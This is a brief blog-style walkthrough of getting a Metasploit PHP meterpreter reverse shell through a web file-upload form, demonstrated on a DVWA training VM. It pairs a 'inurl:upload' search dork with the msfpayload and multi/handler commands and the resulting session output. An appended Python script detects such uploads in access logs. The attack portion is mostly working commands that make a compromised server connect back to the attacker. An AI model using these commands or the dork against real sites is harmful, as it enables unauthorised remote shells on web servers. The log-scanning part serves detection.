inurl:upload

1. Using msfpayload in BackTrack 5 R1

root@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=Your-IP-Address LPORT=8080 R > connection.php

2. connection.php is created in root's home directory.

3. Open msfconsole

use exploit/multi/handler

set PAYLOAD php/meterpreter/reverse_tcp

set LHOST Your-IP-Address

set LPORT 8080

exploit

4. Upload the file to a website, then browse to the directory where it was stored, e.g. dvwa/hackable/uploads:
[ ]    connection.php    21-Jan-2011 11:06     1.3K

5. Double click it.

This should make the remote server tunnel back to your PC.

[*] Started reverse handler on your-ip-address:8080
[*] Starting the payload handler...
[*] Sending stage (38791 bytes) to their-ip-address
[*] Meterpreter session 1 opened (your-ip-address:8080 -> their-ip-address:49119) at 2012-06-26 15:00:18 +0100

meterpreter >

meterpreter > sysinfo
Computer    : dojo-vm
OS          : Linux dojo-vm 2.6.32-25-generic #44-Ubuntu SMP Fri Sep 17 20:26:08 UTC 2010 i686
Meterpreter : php/php

meterpreter > getuid
Server username: www-data (33)
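
Seen from the defending side, step 5 leaves a clear trace in the web server's access log: a request for a script file inside an upload directory. The following is an added example, not part of the original post; it scans combined-format access logs for such requests, and the upload path prefix, the extension list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Assumed upload locations; the first is the DVWA path named on this page.
UPLOAD_DIRS = ("/dvwa/hackable/uploads/",)
# Extensions commonly mapped to the PHP handler (assumed; match your server config).
SCRIPT_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}

# Apache/nginx "combined" access-log format (only the leading fields are needed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def is_script_name(filename):
    """True if any dot-separated part is a script extension (catches x.php.jpg)."""
    parts = filename.lower().split(".")[1:]
    return any(p in SCRIPT_EXT for p in parts)

def find_upload_execution(lines, upload_dirs=UPLOAD_DIRS):
    """Return (ip, timestamp, path, status) for script requests under upload dirs."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        # Decode %-escapes and drop the query string before matching.
        path = unquote(urlsplit(m["target"]).path)
        if not any(path.lower().startswith(d) for d in upload_dirs):
            continue
        if is_script_name(path.rsplit("/", 1)[-1]):
            hits.append((m["ip"], m["ts"], path, int(m["status"])))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [26/Jun/2012:14:58:40 +0100] "POST /dvwa/vulnerabilities/upload/ HTTP/1.1" 200 4521 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [26/Jun/2012:14:59:55 +0100] "GET /dvwa/hackable/uploads/ HTTP/1.1" 200 1180 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [26/Jun/2012:15:00:17 +0100] "GET /dvwa/hackable/uploads/connection.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [26/Jun/2012:15:02:03 +0100] "GET /dvwa/hackable/uploads/photo.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [26/Jun/2012:15:03:11 +0100] "GET /dvwa/hackable/uploads/a%2Ephp.jpg?x=1 HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, ts, path, status in find_upload_execution(SAMPLE_LOG):
        print(f"{ts} {ip} requested {path} -> HTTP {status}")
```

Any hit deserves a look regardless of status code; the durable fix is to store uploads where the PHP handler is not enabled, so that a request like the one in step 5 returns the file's bytes instead of running them as www-data.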

http://www.myexploit.wordpress.com/control-metasploit-php-file-upload/
